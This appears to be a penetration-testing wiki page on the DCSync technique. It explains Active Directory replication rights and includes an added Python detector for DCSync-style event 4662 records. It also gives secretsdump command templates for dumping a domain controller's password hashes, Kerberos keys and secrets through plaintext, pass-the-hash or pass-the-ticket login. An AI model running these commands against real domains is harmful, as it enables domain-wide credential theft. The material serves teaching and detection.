DCSync

How to find sensitive data using a DCSync.


Last updated 11 months ago

Overview

A DCSync is similar to dumping the NTDS.dit file. However, rather than copying NTDS.dit and extracting data from it, DCSync uses the Windows directory replication APIs to ask the domain controller to replicate the domain's data, the same way a second domain controller would.

To perform a DCSync, a domain administrator account is required, or a user holding the privileges DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain.
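Because a DCSync asks for exactly those two replication rights, the request is visible on the domain controller as a Security event 4662 whose Properties field lists the rights' GUIDs (with "Audit Directory Service Access" enabled). The following is an added detection illustration, not code from the original page or from impacket: it scans constructed 4662 records and flags any principal that is not an allow-listed replicator (the domain controllers' computer accounts, plus any directory-sync service account; the names in EXPECTED_REPLICATORS are assumed placeholders). The replication right GUIDs are the well-known Active Directory values.

```python
"""Flag Windows Security event 4662 records that look like DCSync activity."""
from typing import Dict, Iterable, List, Set

# Well-known Active Directory control-access-right GUIDs for replication.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_GUIDS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}

# Assumed allow-list (placeholders): domain controller computer accounts and
# a directory-sync service account that legitimately replicate the domain.
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "MSOL_sync-svc"}

# Constructed sample events (not real logs): the subset of 4662 fields a SIEM
# would forward. Properties lists the requested rights as {GUID} entries.
DOMAIN_OBJECT = "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}"  # domainDNS class
REPL_PROPS = (
    "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
    "\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
)
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # Legitimate replication between domain controllers.
        "EventID": "4662", "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
        "ObjectType": DOMAIN_OBJECT, "Properties": REPL_PROPS, "AccessMask": "0x100",
    },
    {   # Ordinary object access by a user, no replication right requested.
        "EventID": "4662", "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
        "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
        "Properties": "%%7688\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}",
        "AccessMask": "0x10",
    },
    {   # A user account requesting both replication rights: DCSync pattern.
        "EventID": "4662", "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
        "ObjectType": DOMAIN_OBJECT, "Properties": REPL_PROPS, "AccessMask": "0x100",
    },
]


def requested_rights(event: Dict[str, str]) -> Set[str]:
    """Return the replication-right GUIDs present in the event's Properties field."""
    props = event.get("Properties", "").lower()
    return {guid for guid in REPLICATION_GUIDS if guid in props}


def find_dcsync_candidates(events: Iterable[Dict[str, str]],
                           expected: Set[str] = EXPECTED_REPLICATORS) -> List[Dict[str, object]]:
    """Return 4662 events where a non-allow-listed principal asked for replication rights."""
    hits: List[Dict[str, object]] = []
    for event in events:
        if event.get("EventID") != "4662":
            continue
        rights = requested_rights(event)
        if not rights or event.get("SubjectUserName") in expected:
            continue
        hits.append({
            "subject": f"{event.get('SubjectDomainName')}\\{event.get('SubjectUserName')}",
            "rights": sorted(rights),
        })
    return hits


if __name__ == "__main__":
    for hit in find_dcsync_candidates(SAMPLE_EVENTS):
        print(f"possible DCSync by {hit['subject']}: {', '.join(hit['rights'])}")
```

The allow-list is the part that needs care: any account that legitimately replicates (for example an Entra ID Connect sync account) must be in it, otherwise the check fires on every sync cycle; conversely, a DC computer account whose credentials have been stolen would pass the check, so the allow-list should be matched against the source host as well where the SIEM provides it.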

Remotely performing a DCSync

The easiest way to perform a DCSync is to use secretsdump.

secretsdump.py performs various techniques to dump password hashes and secrets.

DCSync using a plaintext password

secretsdump -outputfile 'data' <DOMAIN>/<USER>:<PASSWORD>@<DOMAINCONTROLLER>

DCSync using Pass-the-Hash

secretsdump -outputfile 'data' -hashes <LMhash>:<NThash> <DOMAIN>/<USER>@<DOMAINCONTROLLER>

DCSync using Pass-the-Ticket

secretsdump -k -outputfile 'data' <DOMAIN>/<USER>@<DOMAINCONTROLLER>

secretsdump output

The secretsdump script will output the following files from the DCSync:

  • .ntds

    • LM and NT password hashes, which can be used for hash cracking.

  • .cleartext

    • Passwords stored using reversible encryption

  • .kerberos

    • Kerberos keys (DES, AES128 and AES256)

  • .sam

    • Domain controller's SAM secrets

  • .secrets

    • Domain controller's LSA secrets

https://github.com/fortra/impacket/blob/master/examples/secretsdump.py